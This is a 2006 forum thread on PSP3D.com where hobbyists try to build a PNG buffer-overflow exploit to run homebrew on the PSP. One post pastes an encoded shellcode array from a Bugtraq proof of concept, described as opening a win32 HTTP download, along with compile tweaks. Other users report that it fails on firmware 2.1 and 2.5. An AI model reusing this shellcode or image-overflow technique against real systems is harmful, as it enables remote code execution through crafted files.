PSP3D Left Header
PSP3D Header Right
PSP3D Logo CraveOnline Logo
Help the PSP 3D community grow!
Vote for us below:


Vote on the PSP Top 200
PSP Top 200 - Games, Videos, Wallpapers, Files, Hacks, Homebrew

Development Center - Learn the basics of coding or talk about advanced coding techniques with other developers.

Welcome to PSP3D.com - Sony PlayStation Portable News, Homebrew, Hacks, Reviews, Videos, Mods, Forums!

You are currently viewing our website as a guest, which gives you limited access to reply and interact to discussions and other members. By joining our free community, you will be able to post topics in the forums, communicate privately with other members, vote in polls, and access many other special features.

Registration is fast, simple, and absolutely free so join our community today!

Go Back PSP3D.com - Sony PlayStation Portable News, Homebrew, Hacks, Reviews, Videos, Mods, Forums > PSP Forums > Development Center

Reply
 
LinkBack Thread Tools Display Modes
  #11 (permalink)  
Old 01-02-2006, 07:38 PM
mfaheypride's Avatar
mfaheypride mfaheypride is offline
Senior Member
 
Join Date: Nov 2005
Posts: 391
Points: 40.23
Donate
ADMIN we need to help this kid make a png overflow. Please help. Or anyone for that matter.
__________________
Reply With Quote
  #12 (permalink)  
Old 01-02-2006, 08:24 PM
tullulah's Avatar
tullulah tullulah is offline
Junior Member
 
Join Date: Dec 2005
Posts: 8
Points: 0.00
Donate
Quote:
Originally Posted by mfaheypride
ADMIN we need to help this kid make a png overflow. Please help. Or anyone for that matter.

I' ve found this
http://seclists.org/lists/bugtraq/2005/Feb/0117.html

i hope it help.
__________________
Reply With Quote
  #13 (permalink)  
Old 01-02-2006, 08:24 PM
mfaheypride's Avatar
mfaheypride mfaheypride is offline
Senior Member
 
Join Date: Nov 2005
Posts: 391
Points: 40.23
Donate
come on we need help. This could be something!
__________________
Reply With Quote
  #14 (permalink)  
Old 01-02-2006, 08:27 PM
SpongeFreak52's Avatar
SpongeFreak52 SpongeFreak52 is offline
I'm eatin' ur Bandwidthz!
My Mood:
 
Join Date: Nov 2005
Location: Foodcourtia. Spooky, yes?
Posts: 3,638
Points: 84,973,253,490.47
Donate
Send a message via ICQ to SpongeFreak52 Send a message via AIM to SpongeFreak52 Send a message via ShopTapNham to SpongeFreak52



wow mfahey, ive never seen you so excited. it may be something, but sonys probably ahead of us on this.

Last edited by SpongeFreak52 : 01-02-2006 at 09:42 PM.
Reply With Quote
  #15 (permalink)  
Old 01-02-2006, 08:43 PM
newser's Avatar
newser newser is offline
Senior Member
My Mood:
 
Join Date: Dec 2005
Posts: 287
Points: 16.16
Donate
http://www.sendspace.com/file/wc87ma



this is the mphdowngrader overflow in png format maybe this will help
Reply With Quote
  #16 (permalink)  
Old 01-02-2006, 08:51 PM
tullulah's Avatar
tullulah tullulah is offline
Junior Member
 
Join Date: Dec 2005
Posts: 8
Points: 0.00
Donate
The source code from bugtrag can create png images with overflow code and opens a generic win32 http download. I haven't installed pspsdk, but i think you may change the code :

Code:
char shellcode[] = "\xEB" "\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF" "\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13" "\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2" "\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90" "\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2" "\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48" "\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43" "\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96" "\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD" "\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47" "\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D" "\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33" "\x78\x65\x78\x1D";
For something you want to execute.

Note: to compile with gcc 3.3.6 i have changed this line :
Code:
newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
with this one
Code:
char newshellcode[sizeof(shellcode)+strlen(web)+1];
__________________

Last edited by tullulah : 01-02-2006 at 08:54 PM.
Reply With Quote
  #17 (permalink)  
Old 01-02-2006, 08:51 PM
SpongeFreak52's Avatar
SpongeFreak52 SpongeFreak52 is offline
I'm eatin' ur Bandwidthz!
My Mood:
 
Join Date: Nov 2005
Location: Foodcourtia. Spooky, yes?
Posts: 3,638
Points: 84,973,253,490.47
Donate
Send a message via ICQ to SpongeFreak52 Send a message via AIM to SpongeFreak52 Send a message via ShopTapNham to SpongeFreak52



it didnt do anything in the PHOTO viewer on 2.5, ill try with an mp3
Reply With Quote
  #18 (permalink)  
Old 01-02-2006, 08:57 PM
tullulah's Avatar
tullulah tullulah is offline
Junior Member
 
Join Date: Dec 2005
Posts: 8
Points: 0.00
Donate
Quote:
Originally Posted by spongefreak52
it didnt do anything in the PHOTO viewer on 2.5, ill try with an mp3

didnt worked in the PHOTO viewer on 2.1
__________________
Reply With Quote
  #19 (permalink)  
Old 01-02-2006, 09:00 PM
SpongeFreak52's Avatar
SpongeFreak52 SpongeFreak52 is offline
I'm eatin' ur Bandwidthz!
My Mood:
 
Join Date: Nov 2005
Location: Foodcourtia. Spooky, yes?
Posts: 3,638
Points: 84,973,253,490.47
Donate
Send a message via ICQ to SpongeFreak52 Send a message via AIM to SpongeFreak52 Send a message via ShopTapNham to SpongeFreak52



hey what program do you guys use to tag the mp3s?
Reply With Quote
  #20 (permalink)  
Old 01-02-2006, 09:01 PM
Homer's Avatar
Homer Homer is offline
Moderator...
 
Join Date: Dec 2005
Location: Sweden
Age: 19
Posts: 553
Points: 1.45
Donate
Send a message via ShopTapNham to Homer
You can use Window's media player. That works.
Reply With Quote
Reply

« idea | Working Hombrew on 2.6 !!!!!!!!!!!!!:P »



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is On
Trackbacks are On
Pingbacks are On
Refbacks are On

Points Per Thread View: 0.00
Points Per Thread: 1.00
Points Per Reply: 0.10





Crave Partner Sites: CraveOnline.com | DVDFile.com | PSP3D.com | ComingSoon.net | SuperHeroHype.com | RedBalcony.com | ActionTrip.com | CraveLyrics.com
Soundtrack.net | CraveFix.com | SpikedHumor.com | RPGamer.com | TattooNow.com | ImpactWrestling.com | SeekLyrics.com | PedalBMX.com | WildKO.com
vidKing.com | StrategyInformer.com | HHdb.com | RapLeagues.com | HipHop-Lyrics.com | Cravecocktails.com | ThePhatPhree.com | RideJudge.com | HottieSpots.com

ShopTapNham Shop Online Powered by Custom vB Version 5.1.0 for Crave Online Media, LLC.
Copyright © 2000 - 2007, Jelsoft Enterprises Ltd. and PSP3D.com.
LinkBacks Enabled by vBSEO 3.0.0 RC8

All times are GMT -4. The time now is 10:09 AM.
ShopTapNham Footer Right